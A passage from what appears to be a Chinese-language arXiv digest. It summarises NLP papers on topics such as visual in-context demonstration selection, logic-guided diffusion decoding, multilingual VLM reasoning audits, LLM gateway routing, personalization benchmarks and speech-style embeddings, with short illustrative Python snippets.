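
def majority_label(labels: list[str]) -> str:
    """对同一篇被引文献的多次影响标签做多数投票。"""
    return Counter(labels).most_common(1)[0][0]

def crisp_aggregate(cited: list[str], rank_fn, runs: int = 3, seed: int = 0):
    rng = random.Random(seed)
    votes = {c: [] for c in cited}
    for _ in range(runs):
        order = cited[:]
        rng.shuffle(order)  # 随机化呈现顺序以缓解 LLM 的位置偏差
        for paper, label in rank_fn(order).items():
            votes[paper].append(label)
    return {c: majority_label(v) for c, v in votes.items()}

# 假设性的 rank_fn:无论呈现顺序如何,都认为 P1 影响最大
fake_rank = lambda order: {p: ("high" if p == "P1" else "low") for p in order}
print(crisp_aggregate(["P1", "P2", "P3"], fake_rank))
# {'P1': 'high', 'P2': 'low', 'P3': 'low'}
```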
[NLP-93] Learning to Select Visual In-Context Demonstrations CVPR
【速读】: 该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在视觉任务中依赖上下文学习(In-Context Learning, ICL)时,演示样本选择质量不足的问题。现有主流方法采用无监督的k近邻(k-Nearest Neighbor, kNN)搜索策略,虽简单但对复杂事实回归任务表现不佳,因其倾向于选择冗余示例,难以覆盖任务输出的完整范围。解决方案的关键在于将演示选择重构为序贯决策问题,并提出一种基于强化学习的“学习选择演示”(Learning to Select Demonstrations, LSD)框架:通过双DQN(Dueling DQN)结合以查询为中心的Transformer解码器训练一个策略代理,该代理能够平衡视觉相关性与多样性,从而生成更优的演示集,显著提升MLLM在客观事实回归任务上的性能。
链接: https://arxiv.org/abs/2603.26775
作者: Eugene Lee,Yu-Chi Lin,Jiajie Diao
机构: University of Cincinnati (辛辛那提大学); University of California, Los Angeles (加州大学洛杉矶分校)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注: 21 pages, 12 figure, accepted to Computer Vision and Pattern Recognition Conference (CVPR) 2026 Findings Track
Abstract:Multimodal Large Language Models (MLLMs) adapt to visual tasks via in-context learning (ICL), which relies heavily on demonstration quality. The dominant demonstration selection strategy is unsupervised k-Nearest Neighbor (kNN) search. While simple, this similarity-first approach is sub-optimal for complex factual regression tasks; it selects redundant examples that fail to capture the task’s full output range. We reframe selection as a sequential decision-making problem and introduce Learning to Select Demonstrations (LSD), training a Reinforcement Learning agent to construct optimal demonstration sets. Using a Dueling DQN with a query-centric Transformer Decoder, our agent learns a policy that maximizes MLLM downstream performance. Evaluating across five visual regression benchmarks, we uncover a crucial dichotomy: while kNN remains optimal for subjective preference tasks, LSD significantly outperforms baselines on objective, factual regression tasks. By balancing visual relevance with diversity, LSD better defines regression boundaries, illuminating when learned selection is strictly necessary for visual ICL.
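作为对照的 kNN 基线可以用如下示意实现(假设性代码):按查询嵌入与候选示例嵌入的余弦相似度取前 k 个。这种"相似度优先"的选法容易选中彼此冗余的近邻,正是 LSD 试图用强化学习在相关性与多样性之间加以权衡的地方。

```python
import math

def cosine(u, v):
    """两个向量的余弦相似度。"""
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv)

def knn_select(query, pool, k=2):
    """pool: (示例ID, 嵌入向量) 列表;返回与 query 最相似的 k 个示例ID。"""
    scored = sorted(pool, key=lambda item: cosine(query, item[1]), reverse=True)
    return [name for name, _ in scored[:k]]

pool = [("d1", [1.0, 0.0]), ("d2", [0.9, 0.1]), ("d3", [0.0, 1.0])]
print(knn_select([1.0, 0.05], pool))  # ['d1', 'd2'],相似但相互冗余
```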
[NLP-94] LogicDiff: Logic-Guided Denoising Improves Reasoning in Masked Diffusion Language Models
【速读】: 该论文旨在解决掩码扩散语言模型(Masked Diffusion Language Models, MDLMs)在推理任务中表现不佳的问题,特别是由于其标准基于置信度的解掩码策略会系统性延迟高熵逻辑连接词(logical connective tokens)的生成,而这些连接词是推理链中的关键分支点,导致推理性能严重下降。解决方案的关键在于提出一种无需修改模型参数、不依赖强化学习或任务特定训练的推理时方法——LogicDiff,其核心是引入一个轻量级分类头(4.2M参数)从基础模型的隐藏状态中准确预测每个掩码位置的逻辑角色(如前提、连接词、推导步骤、结论等),并采用依赖顺序调度器按逻辑依赖顺序依次解掩码:先前提、再连接词、后推导步骤和结论。实验证明,该方法显著提升了MDLM在GSM8K和MATH-500上的推理准确率,表明推理缺陷主要源于次优的解掩码顺序,而非模型表征能力不足。
链接: https://arxiv.org/abs/2603.26771
作者: Shaik Aman
机构: 未知
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 9 pages, 3 figures, 3 tables
Abstract:Masked diffusion language models (MDLMs) generate text by iteratively unmasking tokens from a fully masked sequence, offering parallel generation and bidirectional context. However, their standard confidence-based unmasking strategy systematically defers high-entropy logical connective tokens, the critical branching points in reasoning chains, leading to severely degraded reasoning performance. We introduce LogicDiff, an inference-time method that replaces confidence-based unmasking with logic-role-guided unmasking. A lightweight classification head (4.2M parameters, 0.05% of the base model) predicts the logical role of each masked position (premise, connective, derived step, conclusion, or filler) from the base model’s hidden states with 98.4% accuracy. A dependency-ordered scheduler then unmasks tokens in logical dependency order: premises first, then connectives, then derived steps, then conclusions. Without modifying a single parameter of the base model and without any reinforcement learning or task-specific training, LogicDiff improves LLaDA-8B-Instruct accuracy from 22.0% to 60.7% on GSM8K (+38.7 percentage points) and from 23.6% to 29.2% on MATH-500 (+5.6 pp), with less than 6% speed overhead. Our results demonstrate that a substantial portion of the reasoning deficit in MDLMs is attributable to suboptimal token unmasking order, not to limitations of the model’s learned representations.
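LogicDiff 的"依赖顺序调度器"核心逻辑可以用几行代码示意(假设性实现,角色名称为示意;真实系统中每个掩码位置的角色由轻量分类头从基础模型隐藏状态预测):

```python
# 依赖顺序解掩码:前提 -> 连接词 -> 推导步骤 -> 结论 -> 填充词
ROLE_PRIORITY = {"premise": 0, "connective": 1, "derived": 2,
                 "conclusion": 3, "filler": 4}

def unmask_schedule(roles: list[str]) -> list[int]:
    """roles[i] 为位置 i 的预测逻辑角色;返回按逻辑依赖排序的解掩码顺序。"""
    return sorted(range(len(roles)),
                  key=lambda i: (ROLE_PRIORITY[roles[i]], i))

roles = ["premise", "filler", "connective", "premise", "conclusion"]
print(unmask_schedule(roles))  # [0, 3, 2, 4, 1]
```

与标准的置信度优先解掩码不同,这一顺序保证高熵的逻辑连接词不会被推迟到推理链末尾才生成。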
[NLP-95] Aesthetic Assessment of Chinese Handwritings Based on Vision Language Models CCL2025
【速读】: 该论文旨在解决当前汉字手写质量自动评估方法仅提供分数反馈(score-only feedback)而缺乏具体改进建议的问题,这种局限性导致其在提升学习者书写技能方面的有效性不足。解决方案的关键在于利用视觉-语言模型(Vision-Language Models, VLMs)对汉字手写质量进行分析,并生成多层次的反馈信息,包括基础评分(Task 1)和丰富、描述性的反馈(Task 2),同时通过低秩适应(Low-Rank Adaptation, LoRA)微调与上下文学习(in-context learning)两种策略将美学评估知识有效融入VLM中,从而显著提升反馈的指导性和实用性,在CCL 2025手写汉字质量评估竞赛中取得了领先性能。
链接: https://arxiv.org/abs/2603.26768
作者: Chen Zheng,Yuxuan Lai,Haoyang Lu,Wentao Ma,Jitao Yang,Jian Wang
机构: The Open University of China (中国开放大学); Engineering Research Center of Integration and Application of Digital Learning Technology, Ministry of Education (教育部数字学习技术集成与应用工程研究中心); OUC-online (中国开放大学在线)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted by CCL2025
Abstract:The handwriting of Chinese characters is a fundamental aspect of learning the Chinese language. Previous automated assessment methods often framed scoring as a regression problem. However, this score-only feedback lacks actionable guidance, which limits its effectiveness in helping learners improve their handwriting skills. In this paper, we leverage vision-language models (VLMs) to analyze the quality of handwritten Chinese characters and generate multi-level feedback. Specifically, we investigate two feedback generation tasks: simple grade feedback (Task 1) and enriched, descriptive feedback (Task 2). We explore both low-rank adaptation (LoRA)-based fine-tuning strategies and in-context learning methods to integrate aesthetic assessment knowledge into VLMs. Experimental results show that our approach achieves state-of-the-art performances across multiple evaluation tracks in the CCL 2025 workshop on evaluation of handwritten Chinese character quality.
[NLP-96] Do Multilingual VLMs Reason Equally? A Cross-Lingual Visual Reasoning Audit for Indian Languages KR
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在多语言场景下,尤其是印度本土语言中的视觉推理能力评估缺失的问题。现有评测体系主要基于英文数据集(如MathVista、ScienceQA和MMMU),导致模型在非英语语境下的性能表现缺乏系统性分析。解决方案的关键在于构建首个针对印度语言的跨语言视觉推理审计:将980个英文问题通过IndicTrans2翻译成六种印度主流语言(包括印地语、泰米尔语、泰卢固语、孟加拉语、卡纳达语和马拉地语),并利用Gemini 2.0 Flash进行跨翻译者一致性验证(kappa=0.79–0.84)。随后对八种VLMs(从7B开源模型到GPT-4o)进行全面测试,生成68,600条推理记录,并包含文本仅输入与思维链(Chain-of-Thought, CoT)提示的消融实验,揭示了模型在印度语言中平均下降9.8–25个百分点的性能差距,且德拉维达语系语言受损更严重(比印欧语系高最多13.2个百分点),同时发现CoT提示反而恶化了孟加拉语和卡纳达语的表现,表明当前VLMs存在明显的英语中心主义推理偏差。
链接: https://arxiv.org/abs/2603.26742
作者: Swastik R
机构: Indian Institute of Information Technology, Raichur (印度信息技术学院,拉伊丘尔)
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 16 pages, 10 figures, 6 tables. Code and data: this https URL Dataset: this https URL
Abstract:Vision-language models score well on mathematical, scientific, and spatial reasoning benchmarks, yet these evaluations are overwhelmingly English. I present the first cross-lingual visual reasoning audit for Indian languages. 980 questions from MathVista, ScienceQA, and MMMU are translated into Hindi, Tamil, Telugu, Bengali, Kannada, and Marathi using IndicTrans2, with Gemini 2.0 Flash cross-verification on 50 samples per language (inter-translator agreement 0.79-0.84). Eight VLMs, from 7B open-source models to GPT-4o, are evaluated across all seven languages, yielding 68,600 inference records that include text-only and chain-of-thought ablations. I find accuracy drops of 9.8-25 percentage points when switching from English to an Indian language, with Dravidian languages suffering up to 13.2 pp more than Indo-Aryan. Chain-of-thought prompting degrades Bengali (-14.4 pp) and Kannada (-11.4 pp) rather than helping, exposing English-centric reasoning chains. Aya-Vision-8B, built for 23 languages, still drops 28.5 pp on Dravidian scripts; multilingual pretraining alone does not transfer visual reasoning. I release the translated benchmark and all model outputs.
[NLP-97] SleepVLM: Explainable and Rule-Grounded Sleep Staging via a Vision-Language Model
【速读】: 该论文旨在解决自动化睡眠分期(sleep staging)在临床应用中因缺乏可审计推理而难以推广的问题。其核心解决方案是提出SleepVLM,一种基于规则的视觉语言模型(rule-grounded vision-language model, VLM),能够从多通道多导睡眠图(polysomnography, PSG)波形图像中进行睡眠分期,并生成符合美国睡眠医学会(AASM)评分标准的、面向临床医生的可读解释。关键创新在于采用波形感知预训练(waveform-perceptual pre-training)与规则引导的监督微调(rule-grounded supervised fine-tuning),使模型在保持与最先进方法相当的性能(Cohen’s kappa达0.767和0.743)的同时,提供高可信度的透明化推理过程,从而提升自动化睡眠分期系统的可解释性与临床采纳潜力。
链接: https://arxiv.org/abs/2603.26738
作者: Guifeng Deng,Pan Wang,Jiquan Wang,Shuying Rao,Junyi Xie,Wanjun Guo,Tao Li,Haiteng Jiang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Under review
Abstract:While automated sleep staging has achieved expert-level accuracy, its clinical adoption is hindered by a lack of auditable reasoning. We introduce SleepVLM, a rule-grounded vision-language model (VLM) designed to stage sleep from multi-channel polysomnography (PSG) waveform images while generating clinician-readable rationales based on American Academy of Sleep Medicine (AASM) scoring criteria. Utilizing waveform-perceptual pre-training and rule-grounded supervised fine-tuning, SleepVLM achieved Cohen’s kappa scores of 0.767 on a held-out test set (MASS-SS1) and 0.743 on an external cohort (ZUAMHCS), matching state-of-the-art performance. Expert evaluations further validated the quality of the model’s reasoning, with mean scores exceeding 4.0/5.0 for factual accuracy, evidence comprehensiveness, and logical coherence. By coupling competitive performance with transparent, rule-based explanations, SleepVLM may improve the trustworthiness and auditability of automated sleep staging in clinical workflows. To facilitate further research in interpretable sleep medicine, we release MASS-EX, a novel expert-annotated dataset.
[NLP-98] SEAR: Schema-Based Evaluation and Routing for LLM Gateways
【速读】: 该论文旨在解决多模型、多提供商的大语言模型(Large Language Model, LLM)网关中,如何基于细粒度的质量信号和操作性决策来评估生成结果并进行请求路由的问题。其核心挑战在于现有方法难以同时兼顾对响应质量的深度理解与实际部署中的可操作性。解决方案的关键在于提出SEAR系统,该系统采用可扩展的关系型数据 schema,统一建模LLM评估信号(如上下文、意图、响应特征、问题归因及质量评分)与网关运营指标(如延迟、成本、吞吐量),并通过自包含的信号指令、内嵌推理机制和多阶段生成策略,确保输出结构化且可直接用于数据库查询的结果。由于信号来源于LLM自身的推理而非浅层分类器,SEAR不仅能够捕捉复杂请求语义,还支持人类可解释的路由决策,并将评估与路由整合为单一查询层,从而在数千次生产会话中实现高精度信号识别与显著的成本优化。
链接: https://arxiv.org/abs/2603.26728
作者: Zecheng Zhang,Han Zheng,Yue Xu
机构: Strukto.AI(Strukto.AI); Infron.AI(Infron.AI)
类目: Databases (cs.DB); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 10 pages, 6 pages appendix, 4 figures, 12 tables
Abstract:Evaluating production LLM responses and routing requests across providers in LLM gateways requires fine-grained quality signals and operationally grounded decisions. To address this gap, we present SEAR, a schema-based evaluation and routing system for multi-model, multi-provider LLM gateways. SEAR defines an extensible relational schema covering both LLM evaluation signals (context, intent, response characteristics, issue attribution, and quality scores) and gateway operational metrics (latency, cost, throughput), with cross-table consistency links across around one hundred typed, SQL-queryable columns. To populate the evaluation signals reliably, SEAR proposes self-contained signal instructions, in-schema reasoning, and multi-stage generation that produces database-ready structured outputs. Because signals are derived through LLM reasoning rather than shallow classifiers, SEAR captures complex request semantics, enables human-interpretable routing explanations, and unifies evaluation and routing in a single query layer. Across thousands of production sessions, SEAR achieves strong signal accuracy on human-labeled data and supports practical routing decisions, including large cost reductions with comparable quality.
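SEAR 所述"可 SQL 查询的统一 schema"可以用一个极简的 SQLite 片段示意(表名与字段均为假设,实际系统约有上百个类型化列):评估信号表与网关运维指标表通过会话 ID 关联,评估与路由决策即可在同一查询层完成。

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE eval_signals (
    session_id TEXT PRIMARY KEY,
    intent     TEXT,   -- 请求意图
    issue      TEXT,   -- 问题归因
    quality    REAL    -- 质量评分
);
CREATE TABLE gateway_metrics (
    session_id TEXT PRIMARY KEY,
    provider   TEXT,
    latency_ms REAL,
    cost_usd   REAL
);
""")
conn.execute("INSERT INTO eval_signals VALUES ('s1', 'code', NULL, 0.92)")
conn.execute("INSERT INTO gateway_metrics VALUES ('s1', 'provider_a', 850, 0.003)")

# 跨表联合查询:在质量达标的会话中检查成本
row = conn.execute("""
    SELECT e.quality, g.cost_usd
    FROM eval_signals e JOIN gateway_metrics g USING (session_id)
    WHERE e.quality > 0.9
""").fetchone()
print(row)  # (0.92, 0.003)
```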
[NLP-99] AlpsBench: An LLM Personalization Benchmark for Real-Dialogue Memorization and Preference Alignment
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在成为终身AI助手过程中,因缺乏金标准评估基准而导致的个性化能力发展受阻问题。现有基准或忽视个性化信息管理的关键环节,或依赖合成对话数据,存在与真实对话分布不一致的问题。其解决方案的核心是提出AlpsBench——一个基于真实人类-LLM交互对话(来自WildChat数据集)构建的LLM个性化评估基准,包含2,500条长期交互序列及人工验证的结构化记忆,涵盖显性和隐性个性化信号,并定义了个性化信息提取、更新、检索与利用四大核心任务,建立了完整的记忆管理生命周期评估协议,从而为LLM个性化研究提供可量化、可复现的评估框架。
链接: https://arxiv.org/abs/2603.26680
作者: Jianfei Xiao,Xiang Yu,Chengbing Wang,Wuqiang Zheng,Xinyu Lin,Kaining Liu,Hongxun Ding,Yang Zhang,Wenjie Wang,Fuli Feng,Xiangnan He
机构: University of Science and Technology of China (中国科学技术大学); National University of Singapore (新加坡国立大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注:
Abstract:As Large Language Models (LLMs) evolve into lifelong AI assistants, LLM personalization has become a critical frontier. However, progress is currently bottlenecked by the absence of a gold-standard evaluation benchmark. Existing benchmarks either overlook personalized information management that is critical for personalization or rely heavily on synthetic dialogues, which exhibit an inherent distribution gap from real-world dialogue. To bridge this gap, we introduce AlpsBench, An LLM PerSonalization benchmark derived from real-world human-LLM dialogues. AlpsBench comprises 2,500 long-term interaction sequences curated from WildChat, paired with human-verified structured memories that encapsulate both explicit and implicit personalization signals. We define four pivotal tasks - personalized information extraction, updating, retrieval, and utilization - and establish protocols to evaluate the entire lifecycle of memory management. Our benchmarking of frontier LLMs and memory-centric systems reveals that: (i) models struggle to reliably extract latent user traits; (ii) memory updating faces a performance ceiling even in the strongest models; (iii) retrieval accuracy declines sharply in the presence of large distractor pools; and (iv) while explicit memory mechanisms improve recall, they do not inherently guarantee more preference-aligned or emotionally resonant responses. AlpsBench aims to provide a comprehensive framework.
[NLP-100] GeoBlock: Inferring Block Granularity from Dependency Geometry in Diffusion Language Models
【速读】: 该论文旨在解决块扩散(block diffusion)在解码过程中因块大小设置不当而导致的依赖关系不一致问题,即现有块划分策略依赖固定规则或启发式信号,未能充分考虑决定哪些token可安全并行优化的依赖几何结构(dependency geometry)。解决方案的关键在于提出GeoBlock框架,该框架通过分析注意力机制导出的跨token依赖模式,直接从依赖几何中确定块粒度,动态识别几何稳定的优化区域并自适应调整块边界,从而在保持块扩散并行效率的同时,确保依赖一致性的更新,实现类似自回归模型的可靠性。该方法无需额外训练,可无缝集成至现有块扩散架构中。
链接: https://arxiv.org/abs/2603.26675
作者: Lipeng Wan,Junjie Ma,Jianhui Gu,Zeyang Liu,Xuyang Lu,Xuguang Lan
机构: Xi’an Jiaotong University (西安交通大学)
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 13 pages, 4 figures, Code available upon publication
Abstract:Block diffusion enables efficient parallel refinement in diffusion language models, but its decoding behavior depends critically on block size. Existing block-sizing strategies rely on fixed rules or heuristic signals and do not account for the dependency geometry that determines which tokens can be safely refined together. This motivates a geometry view of diffusion decoding: regions with strong causal ordering require sequential updates, whereas semantically cohesive regions admit parallel refinement. We introduce GeoBlock, a geometry-aware block inference framework that determines block granularity directly from attention-derived dependency geometry. Instead of relying on predefined schedules or local confidence heuristics, GeoBlock analyzes cross-token dependency patterns to identify geometrically stable refinement regions and dynamically determines appropriate block boundaries during decoding. By adapting block granularity to the dependency geometry, GeoBlock preserves the parallel efficiency of block diffusion while enforcing dependency-consistent refinement that exhibits autoregressive reliability. GeoBlock requires no additional training and integrates seamlessly into existing block diffusion architectures. Extensive experiments across multiple benchmarks show that GeoBlock reliably identifies geometry-consistent block boundaries and improves the accuracy of block diffusion with only a small additional computational budget.
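The abstract does not spell out the boundary-inference procedure, but the idea can be made concrete with a toy heuristic (an assumption for illustration, not GeoBlock's algorithm): start a new block whenever a token attends only weakly to the tokens accumulated in the current block. The attention matrix and threshold below are invented.

```python
# Illustrative only: derive block boundaries from a row-normalized
# attention matrix by cutting where a token's attention mass to the
# current block drops below a threshold.
def blocks_from_attention(attn, threshold=0.3):
    """attn[i][j]: attention of token i to token j.
    Returns a list of (start, end) half-open block spans."""
    n = len(attn)
    spans, start = [], 0
    for i in range(1, n):
        mass_to_block = sum(attn[i][j] for j in range(start, i))
        if mass_to_block < threshold:      # weak dependency -> cut here
            spans.append((start, i))
            start = i
    spans.append((start, n))
    return spans

# Two cohesive groups of 3 tokens with little cross-group attention.
A = [
    [1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
    [0.5, 0.5, 0.0, 0.0, 0.0, 0.0],
    [0.4, 0.3, 0.3, 0.0, 0.0, 0.0],
    [0.1, 0.1, 0.0, 0.8, 0.0, 0.0],
    [0.0, 0.1, 0.0, 0.4, 0.5, 0.0],
    [0.0, 0.0, 0.1, 0.3, 0.3, 0.3],
]
print(blocks_from_attention(A))  # [(0, 3), (3, 6)]
```

In this toy setting, tokens 0-2 and 3-5 form two semantically cohesive groups, and the cut lands exactly at the weakly coupled boundary; GeoBlock's contribution is doing this robustly during decoding.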
[NLP-101] Exploring Cultural Variations in Moral Judgments with Large Language Models
【速读】: 该论文旨在解决大型语言模型(Large Language Models, LLMs)在捕捉文化多样性道德价值观方面的能力尚不明确的问题。研究通过对比多个单语和多语言模型(如GPT-2、OPT、BLOOMZ、Qwen)与近期指令微调模型(如GPT-4o、GPT-4o-mini、Gemma-2-9b-it、Llama-3.3-70B-Instruct),利用基于对数概率的道德正当性评分(log-probability-based moral justifiability scores)与世界价值观调查(World Values Survey, WVS)及皮尤研究中心全球态度调查(Pew Research Center’s Global Attitudes Survey, PEW)数据进行相关性分析,发现早期或较小模型往往与人类判断呈现接近零或负相关,而先进指令微调模型则表现出显著更高的正相关性,表明其更贴近现实世界的道德态度。关键解决方案在于采用指令微调(instruction tuning)策略,并结合跨文化伦理议题的量化评估方法,从而有效提升模型对不同区域道德规范的理解与映射能力,尽管仍存在部分话题和地区上的偏差问题。
链接: https://arxiv.org/abs/2506.12433
作者: Hadi Mohammadi,Ayoub Bagheri
机构: Utrecht University (乌得勒支大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注:
Abstract:Large Language Models (LLMs) have shown strong performance across many tasks, but their ability to capture culturally diverse moral values remains unclear. In this paper, we examine whether LLMs mirror variations in moral attitudes reported by the World Values Survey (WVS) and the Pew Research Center’s Global Attitudes Survey (PEW). We compare smaller monolingual and multilingual models (GPT-2, OPT, BLOOMZ, and Qwen) with recent instruction-tuned models (GPT-4o, GPT-4o-mini, Gemma-2-9b-it, and Llama-3.3-70B-Instruct). Using log-probability-based moral justifiability scores, we correlate each model’s outputs with survey data covering a broad set of ethical topics. Our results show that many earlier or smaller models often produce near-zero or negative correlations with human judgments. In contrast, advanced instruction-tuned models achieve substantially higher positive correlations, suggesting they better reflect real-world moral attitudes. We provide a detailed regional analysis revealing that models align better with Western, Educated, Industrialized, Rich, and Democratic (W.E.I.R.D.) nations than with other regions. While scaling model size and using instruction tuning improves alignment with cross-cultural moral norms, challenges remain for certain topics and regions. We discuss these findings in relation to bias analysis, training data diversity, information retrieval implications, and strategies for improving the cultural sensitivity of LLMs.
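The evaluation recipe the abstract describes can be sketched in two steps: score each topic by contrasting log-probabilities of opposing completions, then rank-correlate the scores with survey means. The scoring contrast and toy numbers below are illustrative assumptions, not the paper's exact prompts or data.

```python
# Hedged sketch of a log-probability "moral justifiability" score plus a
# Spearman correlation against survey means (all numbers are toy values).
import math

def justifiability_score(logp_justifiable, logp_never):
    """Contrast log-probs of two opposing completions for one topic;
    positive means the model leans 'justifiable'."""
    return logp_justifiable - logp_never

def spearman_rho(xs, ys):
    """Plain Spearman rank correlation (assumes no ties)."""
    def ranks(v):
        order = sorted(range(len(v)), key=lambda i: v[i])
        r = [0.0] * len(v)
        for rank, i in enumerate(order):
            r[i] = float(rank)
        return r
    rx, ry = ranks(xs), ranks(ys)
    n = len(xs)
    mx, my = sum(rx) / n, sum(ry) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(rx, ry))
    sx = math.sqrt(sum((a - mx) ** 2 for a in rx))
    sy = math.sqrt(sum((b - my) ** 2 for b in ry))
    return cov / (sx * sy)

# Toy numbers: four topics, model log-prob pairs vs. survey means (1-10).
model_scores = [justifiability_score(lj, ln)
                for lj, ln in [(-2.1, -3.0), (-4.0, -1.5),
                               (-2.5, -2.4), (-1.0, -4.2)]]
survey_means = [6.2, 1.8, 4.0, 8.5]
print(round(spearman_rho(model_scores, survey_means), 6))  # 1.0
```

A near-zero or negative rho in this setup is exactly what the paper reports for earlier or smaller models; the instruction-tuned models land closer to the perfect-agreement case shown here.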
[NLP-102] ParaSpeechCLAP: A Dual-Encoder Speech-Text Model for Rich Stylistic Language-Audio Pretraining
【速读】: 该论文旨在解决现有模型在语音风格表征方面能力有限的问题,特别是其对语音中内在(如说话人特征)和情境(如语句层面的情感、音调等)风格描述符的建模能力较为狭窄。解决方案的关键在于提出ParaSpeechCLAP,一个双编码器对比学习模型,能够将语音与文本风格描述词映射到统一的嵌入空间,从而支持更广泛的语音风格维度(如音高、质感、情绪等)。通过训练专用的ParaSpeechCLAP-Intrinsic(专注内在风格)、ParaSpeechCLAP-Situational(专注情境风格)以及统一的ParaSpeechCLAP-Combined模型,研究发现专业化模型在单一风格维度上表现更强,而统一模型在组合式评估中更优;此外,引入分类损失和类别平衡训练进一步提升了内在风格模型的性能。
链接: https://arxiv.org/abs/2603.28737
作者: Anuj Diwan,Eunsol Choi,David Harwath
机构: The University of Texas at Austin (德克萨斯大学奥斯汀分校); New York University (纽约大学)
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Sound (cs.SD)
备注: Under review
Abstract:We introduce ParaSpeechCLAP, a dual-encoder contrastive model that maps speech and text style captions into a common embedding space, supporting a wide range of intrinsic (speaker-level) and situational (utterance-level) descriptors (such as pitch, texture and emotion) far beyond the narrow set handled by existing models. We train specialized ParaSpeechCLAP-Intrinsic and ParaSpeechCLAP-Situational models alongside a unified ParaSpeechCLAP-Combined model, finding that specialization yields stronger performance on individual style dimensions while the unified model excels on compositional evaluation. We further show that ParaSpeechCLAP-Intrinsic benefits from an additional classification loss and class-balanced training. We demonstrate our models’ performance on style caption retrieval, speech attribute classification and as an inference-time reward model that improves style-prompted TTS without additional training. ParaSpeechCLAP outperforms baselines on most metrics across all three applications. Our models and code are released at this https URL .
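Dual-encoder models of this kind are typically trained with a symmetric InfoNCE contrastive objective; the sketch below shows that objective in pure Python on toy 2-D embeddings. The embeddings and temperature are illustrative assumptions, not ParaSpeechCLAP's setup (the paper also adds a classification loss for the intrinsic model).

```python
# Sketch of the symmetric (CLIP/CLAP-style) contrastive loss: matched
# (speech_i, caption_i) pairs sit on the diagonal of the cosine-similarity
# matrix, and both retrieval directions are penalized by cross-entropy.
import math

def symmetric_infonce(speech, text, tau=0.07):
    def norm(v):
        n = math.sqrt(sum(x * x for x in v))
        return [x / n for x in v]
    S = [norm(v) for v in speech]
    T = [norm(v) for v in text]
    logits = [[sum(a * b for a, b in zip(s, t)) / tau for t in T] for s in S]

    def xent(rows):
        total = 0.0
        for i, row in enumerate(rows):
            m = max(row)
            log_z = m + math.log(sum(math.exp(x - m) for x in row))
            total += log_z - row[i]        # -log softmax at the diagonal
        return total / len(rows)

    transposed = [list(col) for col in zip(*logits)]
    return 0.5 * (xent(logits) + xent(transposed))

speech = [[1.0, 0.0], [0.0, 1.0]]
loss_matched = symmetric_infonce(speech, [[1.0, 0.0], [0.0, 1.0]])
loss_swapped = symmetric_infonce(speech, [[0.0, 1.0], [1.0, 0.0]])
print(loss_matched < loss_swapped)  # True: matched captions score lower loss
```

Driving this loss down is what pulls a speech clip and its style caption to nearby points in the shared embedding space, which is what enables the retrieval and reward-model applications listed above.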
[NLP-103] Q-Bridge: Code Translation for Quantum Machine Learning via LLMs
【速读】: 该论文旨在解决当前量子机器学习(Quantum Machine Learning, QML)领域中缺乏标准化、高质量数据集和鲁棒代码转换框架的问题,从而阻碍了经典机器学习(Classical Machine Learning, CML)与QML之间的有效衔接。其解决方案的关键在于提出Q-Bridge——一个由大语言模型(Large Language Models, LLMs)引导的代码翻译框架,通过自迭代扩展机制将已验证的经典机器学习代码库系统性地转化为可执行的量子机器学习变体,构建出大规模数据集CML-2-QML,并采用监督式LoRA微调策略实现高效、内存友好的训练,从而在多种架构上生成忠实且可解释的量子代码,验证了直接从CML到QML翻译的可行性并揭示了两类范式间的结构一致性。
链接: https://arxiv.org/abs/2603.27836
作者: Runjia Zeng,Priyabrata Senapati,Ruixiang Tang,Dongfang Liu,Qiang Guan
机构: 未知
类目: Quantum Physics (quant-ph); Computation and Language (cs.CL)
备注:
Abstract:Large language models have recently shown potential in bridging the gap between classical machine learning and quantum machine learning. However, the lack of standardized, high-quality datasets and robust translation frameworks limits progress in this domain. We introduce Q-Bridge, an LLM-guided code translation framework that systematically converts CML implementations into executable QML variants. Our approach builds on a self-involving pipeline that iteratively expands a verified seed codebase into a large-scale dataset, CML-2-QML, integrating verifiable and unverifiable code pairs. The Q-Bridge model is fine-tuned using supervised LoRA adaptation for scalable and memory-efficient training, achieving faithful and interpretable quantum code generation across diverse architectures. Empirical analysis confirms the feasibility of direct CML-to-QML translation and reveals consistent structural alignment between classical and quantum paradigms. Case studies further demonstrate that Q-Bridge can maintain deterministic correctness and also enable creative architectural exploration. This work establishes the first reproducible framework and dataset for LLM-driven quantum code translation, offering a foundation for scalable quantum AI development.
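The supervised LoRA adaptation mentioned in the abstract augments each frozen weight matrix W with a trainable low-rank product B @ A, so only r*(d_in + d_out) parameters are trained. The dependency-free sketch of the forward pass below uses illustrative dimensions, rank, and alpha, not Q-Bridge's actual configuration.

```python
# Sketch of a LoRA forward pass: y = W x + (alpha / r) * B (A x),
# with W frozen and only A, B trainable.
def matvec(M, x):
    return [sum(m * xi for m, xi in zip(row, x)) for row in M]

def lora_forward(W, A, B, x, alpha=16, r=2):
    base = matvec(W, x)                 # frozen path
    delta = matvec(B, matvec(A, x))     # B: (d_out, r), A: (r, d_in)
    scale = alpha / r
    return [b + scale * d for b, d in zip(base, delta)]

W = [[1.0, 0.0], [0.0, 1.0]]            # frozen 2x2 weight
A = [[0.1, 0.0]]                        # r=1 down-projection
B = [[0.0], [0.2]]                      # r=1 up-projection
out = lora_forward(W, A, B, [1.0, 2.0], alpha=2, r=1)
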